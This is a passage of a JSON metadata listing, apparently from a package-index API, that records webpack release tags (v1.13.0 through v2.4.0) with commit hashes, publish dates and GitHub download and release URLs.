pack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_u